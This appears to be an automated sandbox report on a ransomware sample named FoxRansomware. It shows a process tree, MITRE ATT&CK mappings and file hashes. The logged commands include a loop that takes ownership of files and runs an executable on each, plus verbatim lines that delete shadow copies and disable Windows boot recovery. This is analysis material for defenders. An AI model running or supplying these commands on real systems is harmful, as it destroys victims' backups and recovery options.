C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000007O.bin" -nobanner3⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000007O.bin" -nobanner4⤵PID:2684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5152
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin""2⤵PID:4128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin" /E /G Admin:F /C3⤵PID:220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin"3⤵
- Modifies file permissions
PID:5196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000008D.bin" -nobanner3⤵PID:4764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000008D.bin" -nobanner4⤵PID:2508
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4340
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin""2⤵PID:3636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin" /E /G Admin:F /C3⤵PID:5920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin"3⤵
- Modifies file permissions
PID:6064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000008N.bin" -nobanner3⤵PID:2840
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000008N.bin" -nobanner4⤵PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin""2⤵PID:4488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin" /E /G Admin:F /C3⤵PID:5432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin"3⤵
- Modifies file permissions
PID:2620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000093.bin" -nobanner3⤵PID:5300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000093.bin" -nobanner4⤵PID:5076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin""2⤵PID:5244
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin" /E /G Admin:F /C3⤵PID:5128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin"3⤵PID:208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000A9.bin" -nobanner3⤵PID:1804
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000A9.bin" -nobanner4⤵PID:3412
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin""2⤵PID:5408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin" /E /G Admin:F /C3⤵PID:5636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin"3⤵PID:440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000008J.bin" -nobanner3⤵PID:3236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000008J.bin" -nobanner4⤵PID:3924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin""2⤵PID:3756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin" /E /G Admin:F /C3⤵PID:4724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin"3⤵
- Modifies file permissions
PID:2060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000008V.bin" -nobanner3⤵PID:4216
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000008V.bin" -nobanner4⤵PID:5572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:5568
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:5704
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:4520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "superbar.png" -nobanner3⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "superbar.png" -nobanner4⤵PID:1128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:6036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:5460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵PID:4428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5164
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵PID:1048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml""2⤵PID:3792
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml" /E /G Admin:F /C3⤵PID:5776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml"3⤵PID:3064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5404
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵PID:5060
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""2⤵PID:1288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C3⤵PID:5140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"3⤵PID:5732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "DesktopSettings2013.xml" -nobanner3⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "DesktopSettings2013.xml" -nobanner4⤵PID:5336
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""2⤵PID:5960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C3⤵PID:2808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"3⤵PID:4204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner3⤵PID:1980
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner4⤵PID:5832
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""2⤵PID:5820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C3⤵PID:5716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"3⤵PID:2672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner3⤵PID:3676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner4⤵PID:4892
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4356
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml""2⤵PID:1840
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C3⤵PID:5604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml"3⤵
- Modifies file permissions
PID:4392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "VdiState.xml" -nobanner3⤵PID:2840
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "VdiState.xml" -nobanner4⤵PID:3188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3636
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl""2⤵PID:6092
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl" /E /G Admin:F /C3⤵PID:5560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl"3⤵PID:5320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl" -nobanner3⤵PID:5640
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MoUsoCoreWorker.9b96fa87-519f-416e-bb80-fc88a56fe191.1.etl" -nobanner4⤵PID:2896
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:5416
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:5612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "overlay.png" -nobanner3⤵PID:3432
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "overlay.png" -nobanner4⤵PID:3412
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:5244
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:5636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵PID:5508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:3236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵PID:5592
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:5312
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:3568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:4276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "tasks.xml" -nobanner3⤵PID:3556
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "tasks.xml" -nobanner4⤵PID:284
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:3320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:5392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"3⤵PID:4288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:1964
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:4560
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""2⤵PID:5980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C3⤵PID:5724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"3⤵PID:304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner3⤵PID:5360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner4⤵PID:2372
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5764
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\GGYoc9tA.bat"1⤵PID:4164
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:6048
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5388
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:3096
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:5320
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:5488
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5912
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD53273bacef43e6649c676091133686df9
SHA1494349ce86fc6afb347f3dc3523de98be685047c
SHA25636e055a056f03cc1da7fb314c68df7c3e93c4dc4dbdd263e5f9d27c18d9a074c
SHA5126f66aec7444ff755f305a298cbe82a26be94b1670a07b67b82d74038e699e74454571efb7b8bf7c3e5196fd3a74688aaee146eaee357c088ad7ec99c97ba094e
-
Filesize
3KB
MD5f2b607a79b83b3ab759adc5325a19d8c
SHA131edf61e6e2d630d29151c8a86e1f5b71193b64e
SHA2568b20635d7b8c0d1d53e7bd403a817c55221e6efa97c52ace0b5baeb7c2d53425
SHA51208c844dff7d8947b40d986ba28c0ee08537f8dc5c5f7cc41946367cdc8513c0b6b06cccf99d424fa5ae82fca95fed183164b4eba618a8d57d0eef7ee15cb8a20
-
Filesize
16B
MD517d432845dc7cb55ac69d75cf72f7f5d
SHA17f3b6e6ab91b3a13c0611fe6e95befab691d5cc3
SHA256a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4
SHA51225054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0
-
Filesize
1.2MB
MD5c82d64850d35cc6a536c11adbd261cf6
SHA19f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
-
Filesize
16KB
MD5d457fa741ca8de1637a2f4e16183f1fd
SHA11c0bdf4f34e9ed0cea33ac582167d81f845d4cac
SHA256e46e80d4196ae27157cd5b4c849c3359a3263f2d1ec5791c1c2f9a7a7136aa87
SHA512897c268af21e5773b8b073ddda8986067aeff3140dbf06086d70044f687e29c8f2f81336e29dff49bf136531a4a188a867721175ae2a85f5a05754dc3d72c45f
-
Filesize
21KB
MD5cad97e39d29fc07ad046d046b8ede448
SHA162277a8f6897b31c0c4cd2d0037d6614f1118986
SHA25657dabbf7e41e0444473cac803ad11a898abb17dbe6d81f60365496f144fe02de
SHA5124bc2f6bb3b0228a3700c5a3ba5472a8201e617dfd5683a134e34c19dad966e6f86865b039cc6e0b61f1c917650cbfe36815983b61c8995d470112f6390182d21
-
Filesize
226B
MD5f392aba34c355159e4278936247328ce
SHA19773240330b802720b768e655579aa676e32ca59
SHA2569585309d4a7f73379ae45e933da8d685d5707a8dc0a0f622f79c030083cc961d
SHA512479309b16345ea0908c4316521f153a8d3361ab4942ba4ff994686d2a7c6b1a868a162930292f4efc0a6bb9d0e6ea0908c22e1198c2216c04dbfca84dac4d23b
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
260B
MD5e258c4f3ad63f4763534c9e01b2abc47
SHA130185d4a6ffc91e01738d915d94e38588f1b3aac
SHA2563172804bf20f5c6c45d0c82d79dca3c8a57b3c22df6aac72802ec49edf9b5cba
SHA5121331aa17eaa0b32e211cf88ac0c89324da785c7471b8e55b8e33faff2e9549bb5f3f690e010f79249bc0e38907b9cc13808a9d66c516986602ec58f8d3b62b07
-
Filesize
265B
MD54a27959e35af911bfa67e5fb4995e3cd
SHA1d71cef20987495898f537ad69b9b0cfbd418772c
SHA256ebbb43c27f2704cfa16d7ddd56151d5e2581b0fec6ec663c7cec96af67d58e99
SHA512f89162a6c0584936a94aa306ebd7a80dc822700f9ef0ca886c513f8de47203ebfcbe3184abb40f0b82b215b5363030f594718008c2fd16e3a28bfc0409f6fae2